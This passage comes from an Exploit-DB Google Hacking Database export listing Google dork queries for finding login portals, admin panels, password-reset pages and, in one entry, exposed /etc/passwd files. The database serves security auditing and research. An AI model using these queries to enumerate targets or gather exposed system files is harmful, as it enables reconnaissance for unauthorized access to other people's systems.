<shortDescription>site:*/cgi-bin/luci intext:&quot;Authorization Required&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/cgi-bin/luci intext:&quot;Authorization Required&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi-bin/luci intext:&quot;Authorization Required&quot;</query>
<querystring>https://www.google.com/search?q=site:*/cgi-bin/luci intext:&quot;Authorization Required&quot;</querystring>
<edb></edb>
<date>2019-11-08</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5686</id>
<link>https://www.exploit-db.com/ghdb/5686</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/cgi/domadmin.cgi</shortDescription>
<textualDescription>Login Portal:
site:*/cgi/domadmin.cgi
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi/domadmin.cgi</query>
<querystring>https://www.google.com/search?q=site:*/cgi/domadmin.cgi</querystring>
<edb></edb>
<date>2020-01-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5421</id>
<link>https://www.exploit-db.com/ghdb/5421</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/cgi/user.cgi</shortDescription>
<textualDescription>Login Page:
site:*/cgi/user.cgi
Reza Abasi(Turku)
</textualDescription>
<query>site:*/cgi/user.cgi</query>
<querystring>https://www.google.com/search?q=site:*/cgi/user.cgi</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5845</id>
<link>https://www.exploit-db.com/ghdb/5845</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/changePassword.php</shortDescription>
<textualDescription>Login portal:
site:*/changePassword.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/changePassword.php</query>
<querystring>https://www.google.com/search?q=site:*/changePassword.php</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5829</id>
<link>https://www.exploit-db.com/ghdb/5829</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/Citrix/storeweb</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos</textualDescription>
<query>site:*/Citrix/storeweb</query>
<querystring>https://www.google.com/search?q=site:*/Citrix/storeweb</querystring>
<edb></edb>
<date>2020-03-26</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6042</id>
<link>https://www.exploit-db.com/ghdb/6042</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/dana-na/auth/welcome.cgi?p=rolelogo</shortDescription>
<textualDescription>Author: MiningOmerta
Finds some pretty sensitive login portals.
https://google.com/search?q=site:*/dana-na/auth/welcome.cgi?p=rolelogo
site:*/dana-na/auth/welcome.cgi?p=rolelogo
</textualDescription>
<query>site:*/dana-na/auth/welcome.cgi?p=rolelogo</query>
<querystring>https://www.google.com/search?q=site:*/dana-na/auth/welcome.cgi?p=rolelogo</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5596</id>
<link>https://www.exploit-db.com/ghdb/5596</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/Dashboard/ intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login Portals:
site:*/Dashboard/ intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/Dashboard/ intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/Dashboard/ intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-10-25</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6051</id>
<link>https://www.exploit-db.com/ghdb/6051</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/Drupal/login</shortDescription>
<textualDescription>Name [Adarsh Lal]
Google Dork [site:*/Drupal/login]
</textualDescription>
<query>site:*/Drupal/login</query>
<querystring>https://www.google.com/search?q=site:*/Drupal/login</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Adarsh Lal</author>
</entry>
<entry>
<id>5416</id>
<link>https://www.exploit-db.com/ghdb/5416</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/en/login/</shortDescription>
<textualDescription>Login Pages:
site:*/en/login/
Reza Abasi
</textualDescription>
<query>site:*/en/login/</query>
<querystring>https://www.google.com/search?q=site:*/en/login/</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7327</id>
<link>https://www.exploit-db.com/ghdb/7327</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/etc/passwd inurl&quot;/etc/passwd&quot;</shortDescription>
<textualDescription># Google Dork: site:*/etc/passwd inurl&quot;/etc/passwd&quot;
# Pages Containing Login Portals
# Date: 20/09/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>site:*/etc/passwd inurl&quot;/etc/passwd&quot;</query>
<querystring>https://www.google.com/search?q=site:*/etc/passwd inurl&quot;/etc/passwd&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Mostafa Tamam</author>
</entry>
<entry>
<id>5473</id>
<link>https://www.exploit-db.com/ghdb/5473</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/exchange-login/ intitle:&quot;Login&quot;</shortDescription>
<textualDescription>Login Pages:
site:*/exchange-login/ intitle:&quot;Login&quot;
site:*exchange.*/login
site:exchange.*.*/login.aspx
intitle:&quot;Exchange LogIn&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/exchange-login/ intitle:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/exchange-login/ intitle:&quot;Login&quot;</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5436</id>
<link>https://www.exploit-db.com/ghdb/5436</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/forgetpassword.php</shortDescription>
<textualDescription>Login Page and Reset password Page:
site:*/forgetpassword.php
site:*/login/forget_password.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/forgetpassword.php</query>
<querystring>https://www.google.com/search?q=site:*/forgetpassword.php</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5492</id>
<link>https://www.exploit-db.com/ghdb/5492</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/forgot-password</shortDescription>
<textualDescription>Login Portals:
site:*/forgot-password
site:*/password-forget
inurl:&quot;/?forgot_password=yes&quot;
site:*/password-recovery
inurl:&quot;wp-login.php?action=lostpassword&quot;
site:*/auth/reset_password/
site:*/login/# intext:&quot;Reset Password&quot;
site:*/forgot
inurl:&quot;/forgotpassword.jsp?locale=us&quot;
site:*/passwordReset
site:*/pwdreset
site:*/login/reset.html
inurl:&quot;forgotmypassword.html&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/forgot-password</query>
<querystring>https://www.google.com/search?q=site:*/forgot-password</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5378</id>
<link>https://www.exploit-db.com/ghdb/5378</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/forum/login/</shortDescription>
<textualDescription>Forum Login Page:
site:*/forum/login/
site:*/forums/login.php
inurl:&quot;/forums/login.php?do=lostpw&quot;
site:*/forums/admincp/
site:*/forum/lost-password/
site:*/forum/lostpassword/
site:*/forum/login.php?action=forget
site:*/forum/reset/ intitle:&quot;Reset password&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/forum/login/</query>
<querystring>https://www.google.com/search?q=site:*/forum/login/</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5349</id>
<link>https://www.exploit-db.com/ghdb/5349</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/forum/ucp.php?mode=login</shortDescription>
<textualDescription>login portal phpBB
site:*/forum/ucp.php?mode=login
Reza Abasi(Turku)
</textualDescription>
<query>site:*/forum/ucp.php?mode=login</query>
<querystring>https://www.google.com/search?q=site:*/forum/ucp.php?mode=login</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5331</id>
<link>https://www.exploit-db.com/ghdb/5331</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/index.jsp intitle:&quot;login&quot;</shortDescription>
<textualDescription> login portal
site:*/index.jsp intitle:&quot;login&quot;
site:&quot;/index.jsp&quot; intitle:&quot;Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/index.jsp intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/index.jsp intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5418</id>
<link>https://www.exploit-db.com/ghdb/5418</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/index.php/login intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login Page:
site:*/index.php/login intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/index.php/login intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/index.php/login intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5518</id>
<link>https://www.exploit-db.com/ghdb/5518</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/index_signin.php</shortDescription>
<textualDescription>Login Portal:
site:*/index_signin.php
site:*/sign-in intitle:&quot;Sign in&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/index_signin.php</query>
<querystring>https://www.google.com/search?q=site:*/index_signin.php</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5873</id>
<link>https://www.exploit-db.com/ghdb/5873</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/JIRA/login</shortDescription>
<textualDescription>JIRA Login page using
site:*/JIRA/login
</textualDescription>
<query>site:*/JIRA/login</query>
<querystring>https://www.google.com/search?q=site:*/JIRA/login</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>7140</id>
<link>https://www.exploit-db.com/ghdb/7140</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/JIRA/login</shortDescription>
<textualDescription># Google Dork: site:*/JIRA/login
# Pages Containing Login Portals
# Date: 29/08/2021
# Exploit Author: Siddesh Sapkal </textualDescription>
<query>site:*/JIRA/login</query>
<querystring>https://www.google.com/search?q=site:*/JIRA/login</querystring>
<edb></edb>
<date>2021-08-31</date>
<author>Siddesh Sapkal</author>
</entry>
<entry>
<id>5327</id>
<link>https://www.exploit-db.com/ghdb/5327</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/joomla/administrator</shortDescription>
<textualDescription>Joomla admin login portal
site:*/joomla/administrator
Reza Abasi(Turku)
</textualDescription>
<query>site:*/joomla/administrator</query>
<querystring>https://www.google.com/search?q=site:*/joomla/administrator</querystring>
<edb></edb>
<date>2019-08-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6140</id>
<link>https://www.exploit-db.com/ghdb/6140</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/joomla/login</shortDescription>
<textualDescription>Login page of websites developed in Joomla
Google Dork: site:*/joomla/login
Author: Mayank Chandelkar
</textualDescription>
<query>site:*/joomla/login</query>
<querystring>https://www.google.com/search?q=site:*/joomla/login</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Mayank Chandelkar</author>
</entry>
<entry>
<id>5332</id>
<link>https://www.exploit-db.com/ghdb/5332</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/login/auth</shortDescription>
<textualDescription> login portal
site:*/login/auth
Reza Abasi(Turku)
</textualDescription>
<query>site:*/login/auth</query>
<querystring>https://www.google.com/search?q=site:*/login/auth</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5452</id>
<link>https://www.exploit-db.com/ghdb/5452</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/login/ForgotPassword</shortDescription>
<textualDescription>Login for password reset:
site:*/login/ForgotPassword
site:*/login/pw/request
site:*/login/forgot-password
/login/forgot
Reza Abasi(Turku)
</textualDescription>
<query>site:*/login/ForgotPassword</query>
<querystring>https://www.google.com/search?q=site:*/login/ForgotPassword</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5288</id>
<link>https://www.exploit-db.com/ghdb/5288</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/login/login.php</shortDescription>
<textualDescription>Finding login page of php
site:*/login/login.php
Reza Abasi
</textualDescription>
<query>site:*/login/login.php</query>
<querystring>https://www.google.com/search?q=site:*/login/login.php</querystring>
<edb></edb>
<date>2019-07-25</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6046</id>
<link>https://www.exploit-db.com/ghdb/6046</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/login/pass</shortDescription>
<textualDescription>Password reset portals
DORK: site:*/login/pass
~ Irshad Ahamed
</textualDescription>
<query>site:*/login/pass</query>
<querystring>https://www.google.com/search?q=site:*/login/pass</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>5823</id>
<link>https://www.exploit-db.com/ghdb/5823</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/LoginPanel.aspx</shortDescription>
<textualDescription># Google Dork: site:*/LoginPanel.aspx
# This dork found Login Panels.
# Date: 20/03/2020
# Exploit Author: Emre DURMAZ
</textualDescription>
<query>site:*/LoginPanel.aspx</query>
<querystring>https://www.google.com/search?q=site:*/LoginPanel.aspx</querystring>
<edb></edb>
<date>2020-03-23</date>
<author>Emre DURMAZ</author>
</entry>
<entry>
<id>5588</id>
<link>https://www.exploit-db.com/ghdb/5588</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/loginportal/ intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/loginportal/ intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/loginportal/ intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/loginportal/ intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-10-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5380</id>
<link>https://www.exploit-db.com/ghdb/5380</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/logon/ intitle:&quot;Sign In&quot;</shortDescription>
<textualDescription>Login page :
site:*/logon/ intitle:&quot;Sign In&quot;
site:*/logon/ intitle:&quot;login&quot;
site:*/logon/ intitle:&quot;Logon&quot; inurl:/Logon.aspx
site:*/logon/ intitle:&quot;Logon&quot; inurl:/logon.html
site:*/logon/ intitle:&quot;Logon&quot; inurl:/logon.jsp
Reza Abasi(Turku)
</textualDescription>
<query>site:*/logon/ intitle:&quot;Sign In&quot;</query>
<querystring>https://www.google.com/search?q=site:*/logon/ intitle:&quot;Sign In&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5379</id>
<link>https://www.exploit-db.com/ghdb/5379</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/logon/logonpoint/tmindex.html</shortDescription>
<textualDescription>Login Page:
site:*/logon/logonpoint/tmindex.html
Reza Abasi(Turku)
</textualDescription>
<query>site:*/logon/logonpoint/tmindex.html</query>
<querystring>https://www.google.com/search?q=site:*/logon/logonpoint/tmindex.html</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5921</id>
<link>https://www.exploit-db.com/ghdb/5921</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/lost-password/</shortDescription>
<textualDescription>Login Portal:
site:*/lost-password/
Reza Abasi(Turku)
</textualDescription>
<query>site:*/lost-password/</query>
<querystring>https://www.google.com/search?q=site:*/lost-password/</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5880</id>
<link>https://www.exploit-db.com/ghdb/5880</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/lost_pass.php</shortDescription>
<textualDescription>Login portal:
site:*/lost_pass.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/lost_pass.php</query>
<querystring>https://www.google.com/search?q=site:*/lost_pass.php</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5474</id>
<link>https://www.exploit-db.com/ghdb/5474</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/m-login.html</shortDescription>
<textualDescription>Login Portal:
site:*/m-login.html
Reza Abasi(Turku)
</textualDescription>
<query>site:*/m-login.html</query>
<querystring>https://www.google.com/search?q=site:*/m-login.html</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5860</id>
<link>https://www.exploit-db.com/ghdb/5860</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/membersarea intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/membersarea intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/membersarea intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/membersarea intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7473</id>
<link>https://www.exploit-db.com/ghdb/7473</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/membership-login/</shortDescription>
<textualDescription># Google Dork: site:*/membership-login/
# Pages Containing Login Portals
# Date:21/10/2021
# Exploit Author: reza abasi</textualDescription>
<query>site:*/membership-login/</query>
<querystring>https://www.google.com/search?q=site:*/membership-login/</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5658</id>
<link>https://www.exploit-db.com/ghdb/5658</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/my.policy</shortDescription>
<textualDescription>#Author: MiningOmerta
#Google Dork Submission
#This takes you to some log-in pages, some to logged-out pages, and others to juicy info.
site:*/my.policy
</textualDescription>
<query>site:*/my.policy</query>
<querystring>https://www.google.com/search?q=site:*/my.policy</querystring>
<edb></edb>
<date>2019-11-26</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5508</id>
<link>https://www.exploit-db.com/ghdb/5508</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/nms/login intitle:&quot;UNMS&quot;</shortDescription>
<textualDescription>Login Portal:
site:*/nms/login intitle:&quot;UNMS&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/nms/login intitle:&quot;UNMS&quot;</query>
<querystring>https://www.google.com/search?q=site:*/nms/login intitle:&quot;UNMS&quot;</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5570</id>
<link>https://www.exploit-db.com/ghdb/5570</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/oauth/authenticate</shortDescription>
<textualDescription>Login Portal:
site:*/oauth/authenticate
Reza Abasi(Turku)
</textualDescription>
<query>site:*/oauth/authenticate</query>
<querystring>https://www.google.com/search?q=site:*/oauth/authenticate</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7394</id>
<link>https://www.exploit-db.com/ghdb/7394</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/oauth/authorize</shortDescription>
<textualDescription># Google Dork: site:*/oauth/authorize
# Pages Containing Login Portals
# Date: 04/10/2021
# Exploit Author: Reza Abasi</textualDescription>
<query>site:*/oauth/authorize</query>
<querystring>https://www.google.com/search?q=site:*/oauth/authorize</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5544</id>
<link>https://www.exploit-db.com/ghdb/5544</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/oauth2/authorize</shortDescription>
<textualDescription>Login Portal:
site:*/oauth2/authorize
Reza Abasi(Turku)
</textualDescription>
<query>site:*/oauth2/authorize</query>
<querystring>https://www.google.com/search?q=site:*/oauth2/authorize</querystring>
<edb></edb>
<date>2019-09-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5411</id>
<link>https://www.exploit-db.com/ghdb/5411</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/pages/login.php intitle:&quot;Login&quot;</shortDescription>
<textualDescription>Login Pages:
site:*/pages/login.php intitle:&quot;Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/pages/login.php intitle:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/pages/login.php intitle:&quot;Login&quot;</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5909</id>
<link>https://www.exploit-db.com/ghdb/5909</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/PassRecover</shortDescription>
<textualDescription>Login Portal:
site:*/PassRecover
Reza Abasi(Turku)
</textualDescription>
<query>site:*/PassRecover</query>
<querystring>https://www.google.com/search?q=site:*/PassRecover</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5435</id>
<link>https://www.exploit-db.com/ghdb/5435</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/Password.aspx</shortDescription>
<textualDescription>Reset Password Page:
site:*/Password.aspx
Reza Abasi(Turku)
</textualDescription>
<query>site:*/Password.aspx</query>
<querystring>https://www.google.com/search?q=site:*/Password.aspx</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5590</id>
<link>https://www.exploit-db.com/ghdb/5590</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/password/remind</shortDescription>
<textualDescription>Login Portal:
site:*/password/remind
Reza Abasi(Turku)
</textualDescription>
<query>site:*/password/remind</query>
<querystring>https://www.google.com/search?q=site:*/password/remind</querystring>
<edb></edb>
<date>2019-10-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6165</id>
<link>https://www.exploit-db.com/ghdb/6165</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/password_forgotten.php</shortDescription>
<textualDescription>Login Portal:
site:*/password_forgotten.php
BR,
Reza Abasi(Turku)
</textualDescription>
<query>site:*/password_forgotten.php</query>
<querystring>https://www.google.com/search?q=site:*/password_forgotten.php</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5888</id>
<link>https://www.exploit-db.com/ghdb/5888</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/password_lost.php</shortDescription>
<textualDescription>Login Portal:
site:*/password_lost.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/password_lost.php</query>
<querystring>https://www.google.com/search?q=site:*/password_lost.php</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5489</id>
<link>https://www.exploit-db.com/ghdb/5489</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/password_reset/</shortDescription>
<textualDescription>Login Portal:
site:*/password_reset/
site:*/password/reset
site:*/passwordrecovery
site:*/resetpassword.html
site:*/user/request-password-reset/
site:*/resetpass.html
site:*/forum/reset intitle:&quot;Reset Password&quot;
site:*/PasswordReset.aspx
Reza Abasi(Turku)
</textualDescription>
<query>site:*/password_reset/</query>
<querystring>https://www.google.com/search?q=site:*/password_reset/</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6488</id>
<link>https://www.exploit-db.com/ghdb/6488</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/piwik &quot;Sign in&quot; &quot;Matomo&quot;</shortDescription>
<textualDescription># Google Dork: site:*/piwik &quot;Sign in&quot; &quot;Matomo&quot;
# Matomo login portals.
# Date: 12/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:*/piwik &quot;Sign in&quot; &quot;Matomo&quot;</query>
<querystring>https://www.google.com/search?q=site:*/piwik &quot;Sign in&quot; &quot;Matomo&quot;</querystring>
<edb></edb>
<date>2020-08-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5551</id>
<link>https://www.exploit-db.com/ghdb/5551</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/pwdform.htm</shortDescription>
<textualDescription>Login Portal:
site:*/pwdform.htm
Reza Abasi(Turku)
</textualDescription>
<query>site:*/pwdform.htm</query>
<querystring>https://www.google.com/search?q=site:*/pwdform.htm</querystring>
<edb></edb>
<date>2019-09-24</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5362</id>
<link>https://www.exploit-db.com/ghdb/5362</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/quicklogin.php</shortDescription>
<textualDescription>login portal
site:*/quicklogin.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/quicklogin.php</query>
<querystring>https://www.google.com/search?q=site:*/quicklogin.php</querystring>
<edb></edb>
<date>2019-08-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5504</id>
<link>https://www.exploit-db.com/ghdb/5504</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/recover-pass</shortDescription>
<textualDescription>Login Portal:
site:*/recover-pass
site:*/users/recover_password
site:controlpanel.*.*/recover.cgi
inurl:&quot;/login/#forgotpin&quot;
site:*/password/email
inurl:&quot;/plug.php?e=passrecover&quot;
inurl:&quot;/index.php?action=recover_password&quot;
site:*/password/new
site:*/reminder.php
site:cpanel.*.* inurl:&quot;/resetpass?start=1&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/recover-pass</query>
<querystring>https://www.google.com/search?q=site:*/recover-pass</querystring>
<edb></edb>
<date>2019-09-05</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5844</id>
<link>https://www.exploit-db.com/ghdb/5844</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/reminder_password</shortDescription>
<textualDescription>Login Portal:
site:*/reminder_password
Reza Abasi(Turku)
</textualDescription>
<query>site:*/reminder_password</query>
<querystring>https://www.google.com/search?q=site:*/reminder_password</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5886</id>
<link>https://www.exploit-db.com/ghdb/5886</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/request-new-password</shortDescription>
<textualDescription>Login Portal:
site:*/request-new-password
Reza Abasi(Turku)
</textualDescription>
<query>site:*/request-new-password</query>
<querystring>https://www.google.com/search?q=site:*/request-new-password</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5562</id>
<link>https://www.exploit-db.com/ghdb/5562</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/request-password-reset</shortDescription>
<textualDescription>Login Portals:
site:*/request-password-reset
Reza Abasi(Turku)
</textualDescription>
<query>site:*/request-password-reset</query>
<querystring>https://www.google.com/search?q=site:*/request-password-reset</querystring>
<edb></edb>
<date>2019-10-01</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5859</id>
<link>https://www.exploit-db.com/ghdb/5859</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/requestpassword.*</shortDescription>
<textualDescription>Login Portal:
site:*/requestpassword.*
Reza Abasi(Turku)
</textualDescription>
<query>site:*/requestpassword.*</query>
<querystring>https://www.google.com/search?q=site:*/requestpassword.*</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5841</id>
<link>https://www.exploit-db.com/ghdb/5841</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/resetpass.php</shortDescription>
<textualDescription>Login Portal:
site:*/resetpass.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/resetpass.php</query>
<querystring>https://www.google.com/search?q=site:*/resetpass.php</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5496</id>
<link>https://www.exploit-db.com/ghdb/5496</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/resetpassword.php</shortDescription>
<textualDescription>To View ResetPassword Portals of various websites
*Dork: site:*/resetpassword.php*
*Author: Paras Arora*
*Date: 3rd September 2019 *
*Category: Pages Containing Reset Portals*
</textualDescription>
<query>site:*/resetpassword.php</query>
<querystring>https://www.google.com/search?q=site:*/resetpassword.php</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>5840</id>
<link>https://www.exploit-db.com/ghdb/5840</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/retrieve-password</shortDescription>
<textualDescription>Login Portal:
site:*/retrieve-password
Reza Abasi(Turku)
</textualDescription>
<query>site:*/retrieve-password</query>
<querystring>https://www.google.com/search?q=site:*/retrieve-password</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5835</id>
<link>https://www.exploit-db.com/ghdb/5835</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/retrieve.php</shortDescription>
<textualDescription>Login Portal:
site:*/retrieve.php
BR,
Reza Abasi(Turku)
</textualDescription>
<query>site:*/retrieve.php</query>
<querystring>https://www.google.com/search?q=site:*/retrieve.php</querystring>
<edb></edb>
<date>2020-03-27</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5471</id>
<link>https://www.exploit-db.com/ghdb/5471</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/securelogin.asp</shortDescription>
